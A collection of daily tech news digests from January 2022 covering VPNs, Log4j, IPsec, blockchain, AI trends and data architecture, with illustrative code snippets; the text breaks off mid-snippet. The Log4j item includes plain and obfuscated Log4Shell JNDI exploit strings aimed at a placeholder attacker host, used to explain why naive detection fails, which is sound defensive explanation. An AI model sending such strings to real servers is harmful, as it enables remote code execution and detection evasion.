Daily Tech Digest - January 06, 2022

Do tech firms in India really need a 3-month notice period?

Experts have highlighted that a three-month notice period imposes heavy costs on the company from which the candidate resigns. This is because the candidate will have a lower level of productivity since they already have one foot out of the door, which leads to a loss of time and resources for the company. From the candidate’s point of view, a 3-month notice period may hinder their chance of being hired by a new organisation, as the long duration between hiring and joining creates a level of uncertainty. ... When asked about his take on the idea of a 15-day notice period for tech companies, the CEO of NetConnect Global, Mr Sunil Bist, said, “I think it is a great idea when you think about employee growth. After the pandemic, we have seen an acute competition spree to hire the right talent as soon as possible—a more extended notice period would mean losing out on it because of time constraints. ...” In his opinion, “The current norm of a 3 months notice period in most tech companies was started with good intentions, but what a company needs to see is whether it serves its intended purpose.” 


Tailscale: A Virtual Private Network for Zero Trust Security

Unlike traditional, hub-and-spoke VPN network architectures that send network traffic through a central gateway, Tailscale creates a peer-to-peer mesh network. This mesh topology connects each device to every other device directly. A hub-and-spoke architecture is simpler than a mesh, but it has some downsides: higher latency for remote users, no direct connections between individual nodes, harder scaling, and a single point of failure that can break the entire network. In contrast, a peer-to-peer mesh network results in lower latency and higher throughput and eliminates the need to manually configure port forwarding. It also allows for connection migration: existing connections are maintained even when switching to a different network, such as from WiFi to wired. The idea of mesh VPNs has been around for a while, mostly for niche uses. But the advent of cloud-based infrastructure coupled with the rise in remote workers has made organizations take a closer look at them, wrote senior writer Lucian Constantin in CSO Online.
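To make the trade-off concrete, the short Python sketch below (illustrative only, not Tailscale code) compares link counts, hop counts, and failure behaviour for the two topologies; the fleet size of 50 is an arbitrary assumption.

```python
# Back-of-the-envelope comparison of hub-and-spoke vs. full-mesh topologies.
# Illustrative only; not how Tailscale is implemented.

nodes = 50  # arbitrary example fleet size

# Hub-and-spoke: every node links only to the central gateway.
hub_links = nodes                   # one link per node, to the hub
hub_hops = 2                        # node -> hub -> node for any peer traffic
hub_spof = True                     # losing the hub severs all paths

# Full mesh: every node links directly to every other node.
mesh_links = nodes * (nodes - 1) // 2
mesh_hops = 1                       # direct peer-to-peer path
mesh_spof = False                   # no single node failure partitions the rest

print(f"hub-and-spoke: {hub_links} links, {hub_hops} hops, SPOF={hub_spof}")
print(f"full mesh:     {mesh_links} links, {mesh_hops} hops, SPOF={mesh_spof}")
```

The quadratic growth in link count is one reason mesh coordination is usually automated by a control plane rather than configured by hand.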


Researchers used electromagnetic signals to classify malware infecting IoT devices

The researchers proposed a novel approach of using side-channel information to identify malware targeting IoT systems. The technique could allow analysts to determine malware type and identity, even when the malicious code is heavily obfuscated to prevent static or symbolic binary analysis. ... The team analyzed power side-channel signals using convolutional neural networks (CNNs) to detect malicious activities on IoT devices. The collected data is very noisy, so the researchers needed a preprocessing step to isolate the relevant, informative signals. This relevant data was used to train neural network models and machine learning algorithms to classify malware types, binaries, and obfuscation methods, and to detect the use of packers. The academics collected 3,000 traces each for 30 malware binaries and 10,000 traces for benign activity. In total, they recorded 100,000 measurement traces from an IoT device infected by various strains of malware and running realistic benign activity.
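As a sketch of the modelling step, here is a minimal 1D CNN that classifies fixed-length side-channel traces into malware families. The trace length, the five classes, and the random stand-in data are illustrative assumptions, not the researchers' actual setup.

```python
# Minimal sketch: classify 1D side-channel traces with a small CNN.
# The trace length (10,000 samples) and 5 classes are illustrative.
import numpy as np
from tensorflow import keras
from tensorflow.keras import layers

TRACE_LEN, N_CLASSES = 10_000, 5

model = keras.Sequential([
    layers.Input(shape=(TRACE_LEN, 1)),
    layers.Conv1D(16, kernel_size=64, strides=8, activation="relu"),
    layers.MaxPooling1D(4),
    layers.Conv1D(32, kernel_size=16, strides=2, activation="relu"),
    layers.GlobalAveragePooling1D(),
    layers.Dense(N_CLASSES, activation="softmax"),
])
model.compile(optimizer="adam", loss="sparse_categorical_crossentropy",
              metrics=["accuracy"])

# Random placeholders standing in for preprocessed (denoised) traces.
X = np.random.randn(256, TRACE_LEN, 1).astype("float32")
y = np.random.randint(0, N_CLASSES, size=256)
model.fit(X, y, epochs=1, batch_size=32)
```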


Microsoft Sees Rampant Log4j Exploit Attempts, Testing

Most recently, Microsoft has observed attackers obfuscating the HTTP requests made against targeted systems. Those requests generate a log using Log4j 2 that leverages Java Naming and Directory Interface (JNDI) to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. Microsoft has observed many attacks in which the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems. The crafted string that enables Log4Shell exploitation contains “jndi,” followed by the protocol – such as “ldap,” “ldaps,” “rmi,” “dns,” “iiop,” or “http” – and then the attacker domain. But to evade detection, attackers are mixing up the request patterns: for example, Microsoft has seen exploit code written that runs a “lower” or “upper” command within the exploitation string. Even more complicated obfuscation attempts are being made to try to bypass string-matching detections.
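To see why simple string matching struggles, consider this small illustrative Python sketch: a naive pattern catches the textbook exploit string but misses a variant wrapped in Log4j's lookup syntax. The strings are examples only, using a reserved example domain.

```python
# Illustrative only: why substring matching misses obfuscated Log4Shell strings.
import re

plain = "${jndi:ldap://attacker.example/a}"                         # textbook form
obfuscated = "${${lower:J}ndi:${lower:L}dap://attacker.example/a}"  # lookup-wrapped

naive = re.compile(r"\$\{jndi:", re.IGNORECASE)

for probe in (plain, obfuscated):
    print(probe, "->", "MATCH" if naive.search(probe) else "missed")

# The plain string matches; the obfuscated one slips past, because Log4j
# resolves the ${lower:...} lookups *before* the JNDI lookup fires, while
# the detector only ever sees the raw request text.
```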


How IPsec works, its components and purpose

An IPsec VPN connection starts with establishment of a Security Association (SA) between two communicating computers, or hosts. In general, this involves the exchange of cryptographic keys that will allow the parties to encrypt and decrypt their communication. (For more on how cryptography works in general, check out CSO's cryptography explainer.) The exact type of encryption used is negotiated between the two hosts automatically and will depend on their security goals within the CIA triad; for instance, you could encrypt messages to ensure message integrity ... The information about the SA is passed to the IPsec module running on each of the communicating hosts, and each host's IPsec module uses that information to modify every IP packet sent to the other host, and to process similarly modified packets received in return. These modifications can affect both the packet’s header—metadata at the beginning of the packet explaining where the packet is going, where it came from, its length, and other information—and its payload, which is the actual data being sent.
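As a loose illustration of what the negotiated keys are used for, the Python sketch below authenticates and encrypts a packet payload with AES-GCM, roughly analogous to what IPsec's ESP transformation does once an SA is in place. It uses the third-party cryptography library and is not a real IPsec implementation (no SPI, sequence numbers, or header processing).

```python
# Rough analogy to ESP payload protection after SA establishment.
# Not real IPsec: no SPI, sequence numbers, or header handling.
import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = AESGCM.generate_key(bit_length=256)   # stands in for the negotiated SA key
aead = AESGCM(key)

payload = b"GET /index.html HTTP/1.1"       # the packet's actual data
header_meta = b"src=10.0.0.1,dst=10.0.0.2"  # authenticated but left unencrypted

nonce = os.urandom(12)
ciphertext = aead.encrypt(nonce, payload, header_meta)

# The receiving host's IPsec module reverses the transformation; tampering
# with the ciphertext or the bound metadata raises an exception instead.
assert aead.decrypt(nonce, ciphertext, header_meta) == payload
```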


Google makes the perfect case for why you shouldn't use Chrome

MV3 doesn't just create issues for end users. Developers could face challenges as well. According to the EFF: "The changes in Manifest V3 won't stop malicious extensions but will hurt innovation, reduce extension capabilities and harm real-world performance. Google is right to ban remotely hosted code (with some exceptions for things like user scripts), but this is a policy change that didn't need to be bundled with the rest of Manifest V3." The EFF is spot on. Yes, Google should (with few exceptions) ban remote code. But releasing guidance that breaks so much functionality for third-party extensions isn't the way to go. And for developers, this could mean maintaining two different code bases—one for Chrome and one for all other browsers. That's a proposition many devs won't accept. Is it in Google's best interest to prevent the development and usage of ad-blocking extensions? Probably not. But by creating guidance that prevents those developers from creating non-malicious (often helpful) add-ons, Google is putting itself in a rather awkward position. 


breathing.ai Founder Hannes Bend on Improving Mental Health at Work in 2022

Developed based on extensive research, the breathing.ai Chrome extension is built on state-of-the-art machine learning that uses the webcam to detect breathing and heart rate, and to recognize when the user may need a break from the screen and work. Personalized break reminders suggest breathwork, meditation, movement, or simply a break from the screen, based on which options are the most calming or performance-improving for that user. The more than 100 exercises include short deep-breathing routines as breathwork, body scans as meditation, shoulder rolls as movement, and a short walk as a simple break from screens. All exercises are short practices of 20 seconds to 2 minutes that build mindfulness and wellness into the daily flow. The extension also provides soothing background sounds. ... We are currently focused on making screens adaptive to vital signs, and our long-term vision and patent aim to create adaptive interfaces for audio and olfactory devices. Our interfaces, adaptive to the user’s nervous system, will be used not only for screens but also for voice assistants and other audio use cases, personalized diffusers and other olfactory devices, personalized IoT, cars, and all interface-based technological interactions.


Blockchain And You - How Will Blockchain Affect Your Future

Let’s look at a simple health care use case on a private blockchain. In this scenario, patient records are the data blocks, and the transactions that update the data blocks are the chains. This means that all patient information, and any updates made to it, are recorded in the data block. For example, the data block stores prescription information and the procedures performed on the patient. All the data on the data block is immutable and traceable. If the data block is shared with a designated party, this transaction is also traceable. Transferring a patient’s medical records from one hospital to another is easy and secure using blockchain. Additionally, since all the data blocks are immutable, the patient’s records can be used automatically as input to future interactions. Think back to when we discussed filing insurance claims. The information in the patient’s record, such as medications or procedures, could automatically trigger insurance claims. The patient no longer needs to collect all their bills and determine which items might be covered by their insurance policy.
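To make "immutable and traceable" concrete, here is a toy Python sketch of hash-chained records. It is far simpler than a real blockchain (no consensus, signatures, or permissioning), and the patient records are invented examples.

```python
# Toy hash chain illustrating immutability: each record commits to its
# predecessor, so editing any block invalidates every later hash.
import hashlib, json

def block_hash(record: dict, prev_hash: str) -> str:
    body = json.dumps(record, sort_keys=True) + prev_hash
    return hashlib.sha256(body.encode()).hexdigest()

chain = []
prev = "0" * 64  # genesis
for record in [
    {"patient": "P-001", "event": "prescription", "drug": "atorvastatin"},
    {"patient": "P-001", "event": "procedure", "code": "ECG"},
]:
    prev = block_hash(record, prev)
    chain.append({"record": record, "hash": prev})

def verify(chain) -> bool:
    prev = "0" * 64
    for blk in chain:
        if block_hash(blk["record"], prev) != blk["hash"]:
            return False
        prev = blk["hash"]
    return True

print(verify(chain))                    # True
chain[0]["record"]["drug"] = "placebo"  # tamper with history
print(verify(chain))                    # False: the tampering is detectable
```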


Top technology trends come down to CIO strategy in 2022

Generative AI, in which algorithms assess existing data such as text, audio, or visual files, recognize the underlying pattern of that data, and then replicate the pattern to generate similar content, is a top technology trend for CIOs to watch in 2022, Groombridge said. Generative AI can be used to discover new products in research and development settings, he said. "There have been uses of it to identify new medicines and it was even used to rapidly identify potential treatments for COVID, for example," he said. On the operational side of AI, Groombridge said it will be crucial for CIOs to pay attention to AI engineering, a discipline focused on designing systems and applications to better utilize and optimize AI in the enterprise. As businesses recognize AI's potential and rush to build products, they will likely encounter a new challenge -- maintaining the AI algorithms. As input data for models changes and as business outcomes change, the models themselves need adjusting. Lack of maintenance can cause the AI algorithms to eventually lose value, Groombridge said.
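As a small illustration of the maintenance problem, the hedged sketch below flags input-data drift with a two-sample Kolmogorov-Smirnov test, one simple trigger for retraining; the feature values are synthetic stand-ins.

```python
# Minimal drift check: compare a model's training-time feature distribution
# against recent production inputs and flag a retrain when they diverge.
import numpy as np
from scipy.stats import ks_2samp

rng = np.random.default_rng(42)
training_feature = rng.normal(loc=0.0, scale=1.0, size=5000)    # what the model saw
production_feature = rng.normal(loc=0.4, scale=1.2, size=5000)  # what it sees now

stat, p_value = ks_2samp(training_feature, production_feature)
if p_value < 0.01:
    print(f"Drift detected (KS={stat:.3f}, p={p_value:.2e}): schedule retraining")
else:
    print("No significant drift; model inputs look stable")
```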


How to create opportunities in the fragmented European marketplace

As the world continues to change and markets continue to develop, it is vital for market participants to ensure they can access the required markets and services within a stated period of time, while also being able to move to locations where their presence is needed in order to stay ahead of their rivals. Nonetheless, new opportunities tend to emerge from transition. Changes allow organisations to re-evaluate their trading strategies, contemplate utilising new third-party service providers, such as hosting and infrastructure services, and ponder how they can increase their operational efficiencies as well as improve the overall trading experience. In these uncertain times, having access to a ready-made, up-to-standard trading ecosystem is both a necessity and a key differentiator for trading companies. The environment should have adaptive, on-demand connectivity that uses numerous flexible channels and solutions, not to mention co-location services, so that connectivity can be provided to all major hubs. 



Quote for the day:

Don’t be afraid to give up the good to go for the great. -- John D. Rockefeller

Daily Tech Digest - January 05, 2022

5 Cloud Native Trends to Watch out for in 2022

With the emphasis on cybersecurity, I expect to see open source projects and commercial offerings squarely focused on cloud native security. Two areas will get the attention — the software supply chain and eBPF. The software supply chain closely mimics the supply chain of real-world commerce, where resources are consumed, then transformed through a series of steps and processes, and finally supplied to the customer. Modern software development is about assembling and integrating various components available in the public domain as open source projects. In the complex supply chain of software, a compromised piece of software can cause severe damage to multiple deployments. Recent incidents involving Codecov, SolarWinds, Kaseya, and the ua-parser-js NPM package highlight the need to secure the software supply chain. In 2022, there will be new initiatives, projects, and even new startups focusing on secure software supply chain management. The other exciting trend is eBPF, which enables cloud native developers to build secure networking, service mesh, and observability components.
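For a flavour of what eBPF enables, here is a minimal observability sketch using the BCC Python bindings to log every execve call on a Linux host. It assumes Linux with root privileges and the bcc toolchain installed, and is illustrative rather than production-ready.

```python
# Minimal eBPF observability sketch with BCC: print a line whenever any
# process on the host calls execve. Requires Linux, root, and bcc installed.
from bcc import BPF

prog = r"""
int trace_exec(void *ctx) {
    bpf_trace_printk("execve observed\n");
    return 0;
}
"""

b = BPF(text=prog)
b.attach_kprobe(event=b.get_syscall_fnname("execve"), fn_name="trace_exec")
print("Tracing execve... Ctrl-C to exit")
b.trace_print()  # stream kernel trace output to stdout
```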


Second-generation AI-powered digital pills are changing the future of healthcare

Many chronic diseases move along a dynamic trajectory that creates a challenge of unpredictable progression. This is often disregarded by first-generation AI, as it requires constant adaptation of therapeutic regimens. Also, many therapies do not show loss of response for months. The second-generation AI systems are designed to improve response to therapies and facilitate analysing inter-subject and intra-subject variabilities in response to therapies over time. Most first-generation AI systems extract data from large databases and artificially impose a rigid “one for all” algorithm on all subjects. Attempts to constantly amend treatment regimens based on big data analysis might be irrelevant for an individual patient. Imposing a “close to optimal” fit on all subjects does not resolve difficulties associated with dynamicity and the inherent variability of biological systems. The second-generation AI systems focus on a single patient as the epicentre of the algorithm and adapt their output in a timely manner. 


How Walmart Canada Uses Blockchain to Solve Supply-Chain Challenges

A public blockchain network — one that anyone can join without asking for permission — allows unlimited viewing of information stored on it, eliminates intermediaries, and operates independently of any governing party. It is well-suited for digital consumer offerings (like NFTs), cryptocurrencies, and certifying information such as individuals’ degrees or certificates. But private networks — those that require a party to be granted permission to join — are often far better suited for businesses, because access is restricted to verified members and only parties directly working together can see the specific information they exchange. This better satisfies industrial-grade security requirements. For these reasons, Walmart decided to go with a private network built on Hyperledger Fabric, an open-source platform. ... For Walmart and its carriers, this meant working with each carrier’s unique data (vendor name, payment terms, contract duration, and general terms and conditions), which is combined with governing master tables of information such as fuel rates and tax rates. The parties should then jointly agree to the formulas that the blockchain will use to calculate each invoice.
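As a hedged illustration of that invoice logic (not Walmart's actual Hyperledger Fabric chaincode, and with invented field names and rates), the Python sketch below shows the kind of jointly agreed formula that combines a carrier's contract terms with master-table rates so every party computes the same total.

```python
# Illustrative invoice calculation of the kind parties might encode on-chain.
# All field names and rates are invented placeholders, not Walmart's schema.
def calculate_invoice(shipment: dict, master: dict) -> float:
    base = shipment["distance_km"] * shipment["rate_per_km"]
    fuel_surcharge = base * master["fuel_rate"]       # from governing master table
    subtotal = base + fuel_surcharge + shipment["accessorial_fees"]
    return round(subtotal * (1 + master["tax_rate"]), 2)

master_tables = {"fuel_rate": 0.12, "tax_rate": 0.05}
shipment = {"distance_km": 850, "rate_per_km": 1.40,
            "accessorial_fees": 75.0}  # per the carrier's contract terms

# Because the formula is shared, shipper and carrier derive the same total.
print(calculate_invoice(shipment, master_tables))
```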


Property Graphs vs. Knowledge Graphs

A property graph uses nodes, relationships, labels, and “properties.” Both the relationships and their connecting nodes of data are named and capable of storing properties. Nodes can be labeled to mark them as part of a group. Property graphs use “directed edges,” and each relationship has a start node and an end node. Relationships can also be assigned properties. This feature is useful for attaching additional metadata to the relationships between the nodes. ... Knowledge graphs are very useful in working with a data fabric. The semantics feature (and the use of graphs) supports discovery layers and data orchestration in a data fabric. Combining the two makes the data fabric easier to build out incrementally and more flexible, which lowers risk and speeds up deployment. The process allows an organization to develop the fabric in stages. It can be started with a single domain, or a high-value use case, and gradually expanded with more data, users, and use cases. A data fabric architecture, combined with a knowledge graph, supports useful capabilities in many key areas. 
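A minimal sketch of the property-graph model, using the networkx library for illustration (a dedicated graph database such as Neo4j would be typical in practice); the nodes, labels, and properties are invented examples.

```python
# Property-graph sketch: labeled nodes and directed, named relationships,
# both carrying arbitrary key-value properties.
import networkx as nx

g = nx.MultiDiGraph()

# Nodes with labels (group membership) and properties.
g.add_node("alice", label="Person", name="Alice", age=34)
g.add_node("acme", label="Company", name="Acme Corp")

# A directed edge with a relationship type and its own properties,
# i.e., metadata attached to the relationship itself.
g.add_edge("alice", "acme", key="WORKS_AT", since=2019, role="engineer")

# Traverse: every relationship has a start node and an end node.
for start, end, rel, props in g.edges(keys=True, data=True):
    print(f"({start})-[{rel} {props}]->({end})")
```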


Executive Q&A: Getting the Most from Unstructured Data

The world of ten years ago was dominated by structured data. After 2012, though, sensors became cheaper, cell phones gradually became smartphones, and cameras became ubiquitous, making image and video capture easier. With this, a large amount of unstructured data was generated, and enterprises entered uncharted territory, making progress slow. Some of the inhibitors to progress in this area include: Complexity: Unlike structured data, which can be analyzed intuitively, unstructured data needs to be further processed before it can be analyzed, usually best done through artificial intelligence. Machine learning algorithms classify and label content from it. However, it is not easy to identify high-quality data within the data set due to the sheer volume and complexity of unstructured data -- this has been painful for developer teams and a key challenge for data architectures that are already complex. Cost: Although the enterprise recognizes the value of unstructured data, the cost can be a potential obstacle to making use of it. The cost of enterprise infrastructure, human resources, and time can hinder the implementation and development of AI and the data it analyzes.


Google Cloud Attacks Supply Chain Crisis with Digital Twin

“It’s a digital representation of the physical supply chain,” said Hans Thalbauer, the managing director for supply chain and logistics for Google Cloud. “You model all the different locations of your enterprise. Then you model all your suppliers, not just the tier one but tier two, three, and four. You bring in the logistic service providers. You bring in manufacturing partners. You bring in customers and consumers so that you have really the full view.” Once a network of supply chain players has been built out, the customer then starts loading data into their digital twin. The customer starts with their private enterprise data, which typically includes past orders, pricing, costs, and supply and demand forecasts, Thalbauer said. “Then you also want to get information from your business partners,” Thalbauer told Datanami last year. “You share your demands with your suppliers. And they actually loop back to you what is the supply situation. You share the information with the logistics service providers. You share sustainability information with the service provider.”


Fighting fraud in the supply chain with blockchain

Private blockchain platforms are particularly suited to supply chain management because they provide traceability, transparency, real-time logistics tracking, electronic funds transfer and smart contract management. Processes including negotiation support and procurement can also be connected via blockchain to build trust and confidence with new suppliers, partners and colleagues. While private blockchains adhere to the original principles of blockchain and offer all the distributed benefits, they also retain some of the characteristics of more centralised, controlled networks. This provides greater privacy and eliminates many of the illicit activities often associated with public blockchains and cryptocurrencies. No one can enter this type of ‘permissioned’ network without proper authentication, making it ideal where it does not suit an enterprise to allow every participant full access to the entire contents of the database.


Carbon Neutrality Requires Good Data – and Blockchain

Blockchain technology is effective in remedying these problems. As a decentralized, immutable ledger where data can be inputted and shared at every point of action, blockchain works by storing information in interconnected blocks and provides a value-add for insuring carbon offsets. This creates a chain of information that cannot be hacked and can be transmitted between all relevant parties throughout the supply chain. Key players can enter, view, and analyze the same data points securely and with assurance of the data’s accuracy. In addition, the technology can identify patterns of error, giving actionable insights into where systems or humans may be contributing to the problem. Data needs to move with products throughout the supply chain to create an overall number for carbon emissions. Blockchain’s decentralization offers value to organizations and their respective industries so that more reliable data can be shared between all parties to shine a light on the areas they need to work on, such as manufacturing operations and the offsets of buildings. 


Developing Deep Learning Systems Using Institutional Incremental Learning

Institutional Incremental Learning is one of the promising ways of addressing data-sharing concerns. Using this approach, organizations can train the model in a secure environment and can share the model without having to share precious data. Institutional Incremental Learning differs from federated learning. In federated learning, all the participants do the training simultaneously. This is challenging, as the centralized server needs to update and maintain the models, which results in complex technology and communication requirements. ... After training a model locally, the model, along with its metrics, is shared with the participating entities. In this way, the decision to use a particular model lies with the organization that will use it, rather than being forced by anyone. This truly enables decentralized machine learning, where a model is not only trained but also used at the user's discretion. Institutional Incremental Learning also helps to address catastrophic forgetting. 
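A minimal sketch of that hand-off, assuming a Keras model and invented file names: each institution loads the shared model, continues training on its private data, and passes on the updated model and metrics, never the data.

```python
# Institutional Incremental Learning sketch: train on local data, share
# only the model artifact. File names and data files are placeholders.
import numpy as np
from tensorflow import keras

# Receive the model from the previous participating institution.
model = keras.models.load_model("shared_model_from_site_A.keras")

# Private local data never leaves this institution.
local_x = np.load("local_features.npy")
local_y = np.load("local_labels.npy")

model.fit(local_x, local_y, epochs=3, batch_size=32)

# Share the updated model plus its metrics; the next site decides at its
# own discretion whether to adopt this version.
loss, acc = model.evaluate(local_x, local_y, verbose=0)
model.save("shared_model_from_site_B.keras")
print(f"handing off model with local accuracy {acc:.3f}")
```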


Understanding AI’s Limitations Is Key to Unlocking Its Potential

To discern where AI can improve business processes and where it cannot, it’s important to take into account its legal and ethical considerations, its biases and its transparency. Asking hard questions about certain AI applications is critical to setting a project up for success and avoiding risk down the line. From a legal perspective, we must decipher who carries responsibility for a bad judgment call (e.g., a self-driving car hitting a pedestrian). We also must recognize that there is bias when working with cognitive-based technology. AI learns from the data it gets; however, it doesn’t have the means to question this data, which means that data sets can easily skew in one direction and leave AI to adopt bias. This can lead to things like discrimination in recruiting processes or racial bias in healthcare management. Businesses that work with AI will also find themselves walking a fine line between trust and transparency. While the intention of advanced AI is to make more independent decisions over time, engineers can run into a “black box” scenario where it’s unclear how the application came to its decision.



Quote for the day:

"To be the improver of improvements you must challenge assumptions, starting with your own." -- Vala Afshar

Daily Tech Digest - January 04, 2022

Team Topology for Machine Learning

Stream-aligned ML teams are teams that develop and/or manage ML solutions for end users, i.e., domain experts or customers in an organization. For example, in a retail company, such a team can be a markdown/discount-pricing team that delivers prices during seasons throughout the year. The scope of the team can vary but should be determined by the cognitive load on the team. For example, if the data sources and regression mechanism of the solution do not vary too much between the in-season and the sale season, then the cognitive load to support both does not double and, hence, a slightly bigger team can develop, operate, and manage the solutions for its stakeholders. On the other hand, in the same industry, how the online and store channels operate can vary a lot. Therefore, the markdown solution for the online channel may be operated by one team, whereas the same type of solution for the store channel may be operated by a different team. Should such a team develop its own platform or data/infrastructure subsystems?


Connecting the dots on diversity in cybersecurity recruitment

Put simply, a more diverse cybersecurity team is a better cybersecurity team. In a multidisciplinary field like this, different perspectives are critical. When threats and tactics change around us daily, the diverse viewpoints on my team help counter complacency by bringing new thinking to situations. Our adversaries, after all, are continuously trying new tactics, finding new ways to bypass controls and identify vulnerabilities. My team’s different perspectives bring a more disruptive “hacker mindset” to our work in countering attacks. Our industry’s overreliance on specialists with the “right” qualifications and educational backgrounds might actually be a weakness — a point of view reinforced for me by David Epstein’s 2019 book, “Range: Why Generalists Triumph in a Specialized World.” Epstein argues that generalists with wide-ranging interests are more creative, more agile and able to make connections that their more specialized peers can’t see, especially in complex and unpredictable fields — a description that is a good fit for cybersecurity. 


Workplace Trends 2022: The age of employees is here

2022 will see more Gen Z in employment than ever before. Organizational culture will have to create space to address the needs of Gen Z. Multiple studies show that this generation has higher conviction in its own strengths and a profound belief in dialogue. That means organizations will have to create accessible and better platforms for frequent and candid dialogue and train their Gen X and Gen Y leaders to be open to diverse views. McKinsey’s survey reveals this generation’s quest for truth. As per McKinsey, Gen Z is the “True Gen”, in contrast to Gen Y - the millennials, sometimes called the “Me Generation”. To attract and retain Gen Z, HR leaders will have to catalyze a genuine culture of greatness at the workplace rather than rely on labels and brands. They will have to ensure they provide this experience of truth even to interns, as this new generation is more likely to rely on the experience of their peers than on labels and brands. When it comes to technology and business models, we're in the midst of a revolution in which the two can't be separated. 


Seven imperatives for moving beyond digital

Many of today’s problems are so massive that no single entity can solve them on its own. These problems can be tackled only by networks of companies and institutions that work together toward a common purpose. For example, think about people’s need for mobility—which requires dealing with public, shared, and privately owned methods of transportation; infrastructure; public 5G networks; energy supply; financing; regulation; and many more factors. The only way for companies to thrive in this disruptive age is to work with ecosystems and harness the capabilities that others have built in order to deliver their own value propositions—and do so at speed, at scale, and flexibly. When a labor shortage loomed in Japan’s construction industry in 2013, Komatsu tried to address the problem by introducing ICT (information and communications technology) construction machinery that used GPS, digital mapping, sensors, and internet-of-things connections to enhance efficiency. But leaders quickly saw that the new machines were not resulting in the expected increase in productivity. The reason? Bottlenecks in processes at the construction site.


Top 5 trends for endpoint security in 2022

Under budget pressure to deliver more with less, CISOs want to consolidate their tech stacks and save budget for new technologies. Unified Endpoint Management (UEM) proves its value by unifying identity, security, and remote access within Zero Trust Security or ZTNA frameworks, now considered essential for securing an anywhere workforce. As with ZTNA, there has been rapid innovation in UEM over the last twelve months, with reduced security and compliance risk being the goal. UEM’s benefits include streamlining continuous OS updates across multiple mobile devices and platforms, enabling device management, and having an architecture capable of supporting a wide range of devices and operating systems. Another benefit enterprises mention is automating internet-based patching, policy, and configuration management. UEM leaders include Ivanti, whose platform reflects industry leadership with advanced unified endpoint management capabilities.


DataOps will play a pivotal role in financial services growth

Important lessons were learned during the pandemic, not least that banking and other financial institutions’ business models, created pre-COVID, were not suitable for weathering a major crisis. As noted by McKinsey, this could be due to the fact that most business models rely on historical data, “without access to high-frequency data that would enable recalibration”, as well as infrastructure that lacks the agility for effective risk management. In the current landscape of economic recovery, plus the need to navigate the effects of the UK leaving the EU, evolving regulations, intensified competition and more, it’s crucial for financial organisations to rethink their models and data strategies now to strengthen future resilience. Therefore, attention will turn to implementing DataOps practices to make themselves nimble enough to identify and react to sudden micro and macro issues, integrate robust risk assessment and mitigation, and capitalise on newly emerging market opportunities. Further, the digital economy in which we live necessitates an elevated approach to engaging with consumers, who have become accustomed to instantaneous, always-on digital and omnichannel communication and personalisation of products and services on convenient platforms.


Death to Tribal Knowledge

If you have existing documentation and people know about it, you’re doing great! The last hurdle to overcome is making sure that your documentation stays up to date. As time passes, processes change and wikis naturally get out of date. Stale documentation with misleading info is the worst, so finding a good way to keep track of existing documentation and showing ownership in updating it when things change is the problem to solve here. New hires in this instance are again one of the best resources you have. If a new hire is setting up their app locally and runs into issues when following the setup documentation, they should take the time to update the documentation with the correct steps. If your company is actively hiring, this ensures that fresh eyes will be following and improving the documentation every month. The same goes for every other current employee. Any time someone finds information in a wiki that is incorrect, they should do their due diligence and update the documentation. Ignoring the bad information won’t make things any easier for the next person who stumbles across the same page.


Bezier Curve Machine Learning Demonstration

This demonstration features ALGLIB, one of the better numerical analysis libraries available to C# programmers, which offers several easy-to-use machine learning methods. (Later in this series, we will examine MS CNTK routines for C#.) ALGLIB for C# is available and appropriately licensed as a free, single-threaded edition for individual experimentation and use, or as a commercial, multi-threaded edition for purchase. For this demonstration, I will explain at some length how to download and build the free edition as a class library, which will need to be included as a reference for the demonstration program to work. For reference, you can go to the ALGLIB Wikipedia page for a description and history, the ALGLIB website for download information and an excellent online User’s Guide, and to the download itself for a detailed User’s Manual in .html format. ... Our small demonstration data set was built by selecting pre-classified student histories at random, while ensuring a balanced set of demo data representing each status group.


Top Qualities Hiring Managers Look For In Data Scientist Candidates

The ability to code is crucial for good data scientists, which is why almost every data science role has a technical round. But what’s equally important, and sometimes overlooked, is the ability to understand the business. Without business acumen, data scientists will always be passive implementers of tasks instead of the active thought partners they should be. Moreover, only when you truly understand the asks and how they fit into the larger business are you able to problem-solve in creative ways without counting on others to prescribe a solution. ... On top of the technical challenge, construct a business case that candidates have to work through. The business case should closely align with the job description. If the role will involve conducting a lot of metrics analyses, then the case could be a metrics-decomposition type of question; if the role will mainly involve building models, then the case could be a realistic business situation for which candidates can brainstorm modeling solutions.


Why businesses should embrace multi-cloud

For many organisations, multi-cloud is inevitable. After all, it’s unlikely there is a single cloud out there that can support all your requirements. Organisations typically use several, to dozens, to hundreds of SaaS products, as well as a handful of IaaS hosting services, and development PaaS. Some applications will work better on certain platforms – cloud native apps should be happy on AWS, Microsoft Azure or Google Cloud, but traditional apps might prefer Oracle Cloud or IBM Cloud. So, a multi-cloud approach enables you to create this best-of-breed environment. But there are also benefits to being able to run workloads across multiple hyperscale cloud environments – something that is being made easier through containerisation. The caveat is that success for a multi-cloud environment lies in bringing all the pieces together in harmony. It’s ensuring the right workload is distributed to the most appropriate cloud and making sure all the cloud services can communicate with one another. Organisations need to establish and understand the core connectivity between, and governance around, these disparate environments.



Quote for the day:

"Distinguished leaders impress, inspire and invest in other leaders." -- Anyaele Sam Chiyson

Daily Tech Digest - January 03, 2022

Get the most value from your data with data lakehouse architecture

A data lakehouse is essentially the next breed of cloud data lake and warehousing architecture that combines the best of both worlds. It is an architectural approach for managing all data formats (structured, semi-structured, or unstructured) as well as supporting multiple data workloads (data warehouse, BI, AI/ML, and streaming). Data lakehouses are underpinned by a new open system architecture that allows data teams to implement data structures through smart data management features similar to those of data warehouses, over a low-cost storage platform similar to those used in data lakes. ... A data lakehouse architecture allows data teams to glean insights faster, as they can harness data without accessing multiple systems. A data lakehouse architecture can also help companies ensure that data teams have the most accurate and up-to-date data at their disposal for mission-critical machine learning, enterprise analytics initiatives, and reporting purposes. There are several reasons to look at modern data lakehouse architecture in order to drive sustainable data management practices.
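As a hedged sketch of the pattern, the snippet below uses Delta Lake on Spark (one common open-source lakehouse layer) to write an ACID table over low-cost storage and query it with SQL. The paths and configuration are illustrative and assume the delta-spark package is installed; in production the paths would point at object storage such as S3.

```python
# Lakehouse sketch with Delta Lake on Spark: one low-cost storage layer
# serving both warehouse-style SQL and data-science reads. Paths are
# illustrative placeholders.
from pyspark.sql import SparkSession

spark = (
    SparkSession.builder.appName("lakehouse-sketch")
    # Assumes the delta-spark package is available on the classpath.
    .config("spark.sql.extensions", "io.delta.sql.DeltaSparkSessionExtension")
    .config("spark.sql.catalog.spark_catalog",
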